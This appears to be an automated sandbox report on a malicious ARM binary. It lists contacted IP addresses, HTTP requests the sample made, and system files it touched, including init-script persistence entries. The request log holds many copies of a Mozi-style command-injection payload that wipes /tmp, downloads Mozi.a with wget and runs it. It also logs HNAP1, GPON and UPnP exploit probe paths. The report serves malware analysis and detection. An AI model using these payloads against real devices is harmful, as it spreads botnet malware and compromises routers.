Engine | Download Report | Detection | Info |
---|---|---|---|
|
malicious
Score: 100
|
System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
|
IP | Country | Detection |
---|---|---|
104.18.212.109 | United States | |
14.157.7.132 | China | |
177.235.125.171 | Brazil | |
Click to see the 97 hidden entries | ||
172.235.37.18 | United States | |
111.35.220.93 | China | |
114.229.79.184 | China | |
145.151.76.22 | Netherlands | |
185.15.232.248 | Poland | |
40.148.150.206 | United States | |
208.123.30.213 | United States | |
153.150.250.247 | Japan | |
45.201.153.34 | Seychelles | |
152.98.6.1 | Australia | |
163.155.194.73 | Canada | |
100.0.36.253 | United States | |
145.76.220.75 | Netherlands | |
76.93.7.211 | United States | |
86.150.170.105 | United Kingdom | |
98.84.53.77 | United States | |
53.11.240.96 | Germany | |
148.197.232.220 | United Kingdom | |
57.28.254.228 | Belgium | |
120.163.172.74 | Indonesia | |
60.156.178.227 | Japan | |
39.87.169.75 | China | |
145.38.31.118 | Netherlands | |
54.188.63.169 | United States | |
191.174.69.30 | Brazil | |
26.128.194.202 | United States | |
154.188.226.59 | Egypt | |
36.50.91.132 | unknown | |
212.215.226.87 | Saudi Arabia | |
54.14.83.162 | United States | |
36.214.215.112 | China | |
181.155.111.181 | Colombia | |
135.16.94.74 | United States | |
196.125.98.125 | Morocco | |
211.222.30.223 | Korea Republic of | |
145.205.48.193 | Netherlands | |
1.12.89.39 | China | |
110.250.142.2 | China | |
125.23.212.52 | India | |
203.43.100.92 | Australia | |
84.192.134.80 | Belgium | |
172.117.38.170 | United States | |
119.106.13.214 | Japan | |
16.211.121.11 | United States | |
67.18.88.112 | United States | |
221.72.129.130 | Japan | |
117.32.98.92 | China | |
61.16.233.86 | India | |
36.16.166.235 | China | |
7.247.43.178 | United States | |
206.198.15.97 | United States | |
128.23.67.250 | United States | |
169.128.252.16 | United States | |
169.188.171.172 | United States | |
219.195.15.197 | Japan | |
19.215.239.94 | United States | |
102.3.171.51 | unknown | |
178.24.39.153 | Germany | |
44.118.168.46 | United States | |
186.179.206.121 | Suriname | |
175.113.47.10 | Korea Republic of | |
192.57.157.115 | United States | |
164.206.111.135 | United States | |
71.124.20.176 | United States | |
17.189.72.210 | United States | |
83.159.171.135 | France | |
44.135.83.126 | United States | |
4.24.175.119 | United States | |
171.204.177.103 | United States | |
101.219.236.147 | India | |
14.113.151.128 | China | |
140.246.154.86 | China | |
151.53.156.127 | Italy | |
2.111.75.31 | Denmark | |
95.189.76.91 | Russian Federation | |
48.79.125.83 | United States | |
66.253.129.191 | United States | |
80.10.123.163 | France | |
99.217.124.102 | Canada | |
55.109.86.174 | United States | |
30.152.208.150 | United States | |
191.140.23.27 | Brazil | |
207.95.76.147 | United States | |
175.253.230.210 | Korea Republic of | |
150.78.101.48 | Japan | |
31.204.37.94 | Russian Federation | |
195.179.47.20 | Germany | |
98.69.192.78 | United States | |
215.207.168.2 | United States | |
37.156.149.170 | Italy | |
197.24.121.202 | Tunisia | |
81.214.23.163 | Turkey | |
66.28.124.43 | United States | |
158.12.47.11 | United States | |
208.209.43.197 | United States | |
147.175.216.75 | Slovakia (SLOVAK Republic) | |
48.167.28.202 | United States |
Name | Detection |
---|---|
http://52.203.212.170:80/HNAP1/ | |
http://92.122.239.28:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://89.163.130.111:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
Click to see the 54 hidden entries | |
http://67.212.232.27:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://188.95.249.207:80/HNAP1/ | |
http://136.0.50.200:80/HNAP1/ | |
http://23.45.248.194:80/HNAP1/ | |
http://127.0.0.1:80/GponForm/diag_Form?images/ | |
http://189.125.204.192:80/HNAP1/ | |
http://73.84.170.111:80/HNAP1/ | |
http://127.0.0.1:8080/GponForm/diag_Form?images/ | |
http://23.49.66.98:80/HNAP1/ | |
http://177.107.169.66:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://183.100.101.157:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://220.132.237.29:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://23.231.129.203:80/HNAP1/ | |
http://154.193.198.80:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://216.58.222.247:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://212.60.41.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://208.122.196.225:80/HNAP1/ | |
http://54.223.116.164:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://46.97.231.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://110.81.155.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://156.247.54.34:80/HNAP1/ | |
http://217.182.235.37:80/HNAP1/ | |
http://207.58.129.69:80/HNAP1/ | |
http://104.65.91.186:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://34.192.203.149:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://213.16.167.167:80/HNAP1/ | |
http://129.88.11.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://86.149.244.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://104.68.235.99:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://46.152.153.118:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://95.165.161.161:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://91.193.76.163:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://181.58.102.188:80/HNAP1/ | |
http://123.56.231.112:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://183.111.156.90:80/HNAP1/ | |
http://123.231.71.78:80/HNAP1/ | |
http://3.112.248.216:80/HNAP1/ | |
http://173.242.182.66:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | |
http://166.145.64.120:49152/soap.cgi?service=WANIPConn1 | |
http://127.0.0.1:7574/UD/act?1 | |
http://www.alsa-project.org. | |
http://www.pastebin.ca | |
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah | |
http://112.178.233.60:80/HNAP1/ | |
http://217.69.175.190:80/HNAP1/ | |
http://www.alsa-project.org | |
http://www.pastebin.ca/upload.php | |
http://www.alsa-project.org/cardinfo-db/ | |
http://upx.sf.net | |
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY | |
http://www.alsa-project.org/alsa-info.sh | |
http://194.62.214.93:80/HNAP1/ | |
http://pastebin.ca) | |
http://www.pastebin.ca. |
Name | File Type | Hashes | Detection |
---|---|---|---|
/etc/init.d/mountdevsubfs.sh |
ASCII text | # | |
/usr/networks |
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped | # | |
/etc/rcS.d/S95baby.sh |
POSIX shell script, ASCII text executable | # | |
Click to see the 97 hidden entries | |||
/etc/rc.local |
ASCII text | # | |
/etc/profile.d/vte-2.91.sh |
ASCII text | # | |
/etc/profile.d/cedilla-portuguese.sh |
ASCII text | # | |
/etc/profile.d/bash_completion.sh |
ASCII text | # | |
/etc/profile.d/apps-bin-path.sh |
ASCII text | # | |
/etc/profile.d/Z97-byobu.sh |
ASCII text | # | |
/etc/init.d/umountnfs.sh |
ASCII text | # | |
/etc/init.d/mountnfs.sh |
ASCII text | # | |
/etc/init.d/mountnfs-bootclean.sh |
ASCII text | # | |
/etc/init.d/mountkernfs.sh |
ASCII text | # | |
/etc/init.d/mountall.sh |
ASCII text | # | |
/etc/init.d/hwclock.sh |
ASCII text | # | |
/etc/init.d/S95baby.sh |
POSIX shell script, ASCII text executable | # | |
/etc/init.d/bootmisc.sh |
ASCII text | # | |
/etc/init.d/checkfs.sh |
ASCII text | # | |
/etc/init.d/checkroot-bootclean.sh |
ASCII text | # | |
/etc/init.d/checkroot.sh |
ASCII text | # | |
/etc/init.d/hostname.sh |
ASCII text | # | |
/etc/init.d/mountall-bootclean.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/remotes2config.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-revert.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/rerere-train.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/subtree/git-subtree.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh |
ASCII text | # | |
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/git-resurrect.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/fast-import/git-import.sh |
ASCII text | # | |
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-whatchanged.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-verify-tag.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-tag.sh |
ASCII text | # | |
/usr/share/doc/netcat-openbsd/examples/dist.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-resolve.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-reset.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-repack.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-pull.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-notes.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-merge.sh |
ASCII text | # | |
/usr/share/doc/mdadm/examples/mdadd.sh |
ASCII text | # | |
/usr/share/keyutils/request-key-debug.sh |
ASCII text | # | |
/usr/share/hplip/hplip_clean.sh |
ASCII text | # | |
/usr/share/doc/xdotool/examples/ffsp.sh |
ASCII text | # | |
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh |
ASCII text | # | |
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh |
ASCII text | # | |
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh |
ASCII text | # | |
/usr/share/doc/tmux/examples/bash_completion_tmux.sh |
ASCII text | # | |
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh |
ASCII text | # | |
/usr/share/doc/gdb/contrib/gdb-add-index.sh |
ASCII text | # | |
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh |
ASCII text | # | |
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh |
ASCII text | # | |
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh |
ASCII text | # | |
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh |
ASCII text | # | |
/usr/share/doc/libsane/plustek/MakeModule.sh |
ASCII text | # | |
/usr/share/doc/ifupdown/examples/ping-places.sh |
ASCII text | # | |
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh |
ASCII text | # | |
/usr/share/doc/ifupdown/examples/get-mac-address.sh |
ASCII text | # | |
/usr/share/doc/ifupdown/examples/check-mac-address.sh |
ASCII text | # | |
/etc/wpa_supplicant/ifupdown.sh |
ASCII text | # | |
/usr/share/doc/acpid/examples/ac.sh |
ASCII text | # | |
/usr/share/debconf/confmodule.sh |
ASCII text | # | |
/usr/share/cups/braille/indexv4.sh |
ASCII text | # | |
/usr/share/cups/braille/indexv3.sh |
ASCII text | # | |
/usr/share/cups/braille/index.sh |
ASCII text | # | |
/usr/share/cups/braille/cups-braille.sh |
UTF-8 Unicode text | # | |
/usr/share/brltty/initramfs/brltty.sh |
ASCII text | # | |
/usr/share/alsa/utils.sh |
ASCII text | # | |
/usr/share/alsa-base/alsa-info.sh |
ASCII text, with very long lines | # | |
/usr/share/doc/acpid/examples/default.sh |
ASCII text | # | |
/etc/wpa_supplicant/functions.sh |
ASCII text | # | |
/etc/wpa_supplicant/action_wpa.sh |
ASCII text | # | |
/etc/libreoffice/soffice.sh |
ASCII text | # | |
/etc/bash_completion.d/libreoffice.sh |
ASCII text | # | |
/etc/acpi/undock.sh |
ASCII text | # | |
/etc/acpi/tosh-wireless.sh |
ASCII text | # | |
/etc/acpi/powerbtn.sh |
ASCII text | # | |
/etc/acpi/ibm-wireless.sh |
ASCII text | # | |
/etc/acpi/asus-wireless.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-ls-remote.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-log.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-gc.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-fetch.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-commit.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-clone.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-clean.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-checkout.sh |
ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-am.sh |
OS/2 REXX batch file, ASCII text | # | |
/usr/share/doc/git/contrib/examples/git-merge-ours.sh |
ASCII text | # | |
/etc/acpi/asus-keyboard-backlight.sh |
ASCII text | # | |
/usr/share/doc/gdb/contrib/expect-read1.sh |
ASCII text | # | |
/usr/share/doc/gdb/contrib/ari/gdb_find.sh |
ASCII text | # | |
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh |
ASCII text | # | |
/usr/share/doc/gawk/examples/prog/igawk.sh |
awk or perl script, ASCII text | # | |
/usr/share/doc/gawk/examples/network/PostAgent.sh |
ASCII text | # | |
/usr/share/doc/cron/examples/cron-tasks-review.sh |
ASCII text | # | |
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh |
ASCII text | # |